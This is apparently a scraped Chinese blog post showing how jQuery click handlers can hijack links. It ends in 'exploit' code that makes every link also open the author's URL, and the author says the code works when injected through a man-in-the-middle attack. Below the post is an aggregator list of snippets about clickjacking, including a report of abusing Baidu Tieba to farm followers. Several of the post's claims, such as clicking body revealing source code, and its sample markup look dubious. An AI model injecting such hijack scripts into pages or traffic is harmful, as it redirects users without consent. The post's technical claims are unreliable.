jquery实现点击劫持代码

一直在找一个全屏的透明图层点击弹窗代码,虽然没找到,不过有了一些意外的新发现

在浏览百度知道时,发现了jquery可以为div添加onclick事件

代码如下:

<script type="text/javascript" src="jquery.js"></script>
<div id="one">1</div>
<div id="one">2</div>
<div id="one">3</div>
<div id="one">4</div>
<div id="one">5</div>

<script type="text/javascript">
  $(function(){
    $("div").each(function(){
      $(this).click(function(){
        alert($(this).text());
      });
    });</script>

这样每个div都可以赋予点击事件,那么,body标签呢?<a>标签呢?

我分别进行了测试 发现在webkit内核下:

<script type="text/javascript" src="jquery.js"></script>
<div id="one">1</div>
<div id="one">2</div>
<div id="one">3</div>
<div id="one">4</div>
<div id="one">5</div>
<body>aaaa</body>
<a href="http://baidu.com/">a</a>
<script type="text/javascript">
  $(function(){
    $("div").each(function(){
      $(this).click(function(){
        alert($(this).text());
      });
    });
    $("body").each(function(){
      $(this).click(function(){
        alert($(this).text());
      });
    });
    $("a").each(function(){
      $(this).click(function(){
        alert($(this).text());
      });
    });
  });
</script>

当点击body元素时,出现了网页的源代码,而点击<a>标签时,则会先弹出alert再转到链接!换句话说,成功的利用jquery劫持了链接!

参见了这篇给div加跳转的文章http://www.cdxwcx.com/faq/htmldivLink.html后,最终的exploit代码如下:

<a href="http://baidu.com/">我只是个无辜的链接</a>

<script type="text/javascript" src="http://lib.sinaapp.com/js/jquery/1.9.1/jquery-1.9.1.min.js"></script>
<script type="text/javascript">
  $(function(){
    $("a").each(function(){
      $(this).click(function(){
        window.open('http://blog.csdn.net/qq754406613');
      });
    });
  });
</script>

亲测中间人攻击时注入此代码可用

时间: 2024-08-25 15:38:20

jquery实现点击劫持代码的相关文章

jQuery实现点击文本框清除内容代码实例

jQuery实现点击文本框清除内容代码实例:本章节介绍一下文本框最简单的一个人性化措施,就是点击文本框的时候能够删除里面的提示文本.代码实例如下: <!DOCTYPE html> <html> <head> <meta charset="utf-8"> <meta name="author" content="http://www.softwhy.com/" /> <title&g

基于jQuery+CSS3点击动画弹出表单代码

分享一款基于jQuery+CSS3点击动画弹出表单代码是一款鼠标点击图标按钮动画弹出表单特效代码.效果图如下: 在线预览   源码下载 实现的代码. html代码: <div class="buttonCollection"> <div class="qutton" id="qutton_upload"> <div class="qutton_dialog" id="uploadDial

17款jQuery在线QQ客服代码分享

17款jQuery在线QQ客服代码分享给大家咯!!拿走,不谢,我叫雷锋~~ jQuery侧边栏点击展开收缩在线QQ客服代码 jQuery网页右侧固定层显示隐藏在线qq客服代码 jQuery点击按钮遮罩弹出在线QQ客服代码 jQuery带留言在线qq客服代码 绿色的jquery qq在线客服网页右侧固定层qq客服隐藏显示代码 蓝色的jquery固定div悬浮在线客服代码 jquery固定层网页侧边栏在线qq客服代码 jquery浮动在左侧的QQ客服代码 带有弹性可伸缩的在线客服代码 jquery右

点击劫持漏洞

0x01:什么是点击劫持 点击劫持是一种视觉上的欺骗手段,攻击者使用一个透明的.不可见的iframe,覆盖在一个网页上,然后诱使用户在该网页上进行操作,此时用户在不知情的情况下点击了透明的iframe页面.通过调整iframe页面的位置,可以诱使用户恰好点击在iframe页面的一些功能性按钮上,攻击者常常配合社工手段完成攻击. 0x02 漏洞危害 攻击者精心构建的另一个置于原网页上面的透明页面.其他访客在用户毫不知情的情况下点击攻击者的页面从而完成攻击.具体危害取决Web应用. 0x03 POC

jQuery实现设置字体大小代码实例

jQuery实现设置字体大小代码实例:设置网页中字体的大小是常见的操作,下面就通过代码实例介绍一下如何实现此功能.代码如下: <!DOCTYPE html> <html> <head> <meta charset=" utf-8"> <meta name="author" content="http://www.softwhy.com/" /> <title>蚂蚁部落<

百度贴吧点击劫持(可恶意刷粉丝)及解决方案

百度贴吧没考虑点击劫持防御,可造成恶意刷粉丝.估计很多地方都没考虑,还可以继续挖. 点击劫持(ClickJacking)是由互联网安全专家罗伯特.汉森和耶利米.格劳斯在2008年首创的.是一种视觉欺骗手段,在Web端就是Iframe嵌套一个透明不可见的页面,让用户在不知情的情况下,点击攻击者想要欺骗用户点击的位置. 百度贴吧页面没考虑该漏洞,可以导致恶意刷粉丝. 想象一下,我在某个大号下留个劲爆消息,诱导用户到我的域名点击按钮,最后大家都成我贴吧的粉丝了. 我的本地页面代码: <html> &

JQuery实现点击div以外的位置隐藏该div窗口

简单示例代码: <body> <script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.7.1/jquery.min.js"></script> <script type="text/javascript"> $(function(){ $(document).bind("click&

《白帽子讲WEB安全》学习笔记之第5章 点击劫持(clickjacking)

第5章 点击劫持(clickjacking) 5.1 什么是点击劫持 点击劫持是一种视觉上的欺骗手段.是一种在网页中将恶意代码等隐藏在看似无害的内容(如按钮)之下,并诱使用户点击的手段. 主要特征 q  点击劫持是一种恶意攻击技术,用于跟踪网络用户,获取其私密信息或者通过让用户点击看似正常的网页来远程控制其电脑.很多浏览器和操作平台都有这样的漏洞. q  点击劫持技术可以用嵌入代码或者文本的形式出现,在用户毫不知情的情况下完成攻击,比如点击一个表面显示是"播放"某个视频的按钮,而实际上

jquery实现点击页面其他地方隐藏指定元素

jquery实现点击页面其他地方隐藏指定元素:在很多效果中,都有这样的功能,当点击页面的其他地方时,能够隐藏一个指定的元素,例如在模拟实现的select下拉菜单效果中,当下拉菜单出现的时候,我们往往希望当点击页面其他地方的时候,能够隐藏下拉条,下面就通过一个实例单独介绍一下如何实现此功能.代码实例如下: <!DOCTYPE html> <html> <head> <meta charset=" utf-8"> <meta name=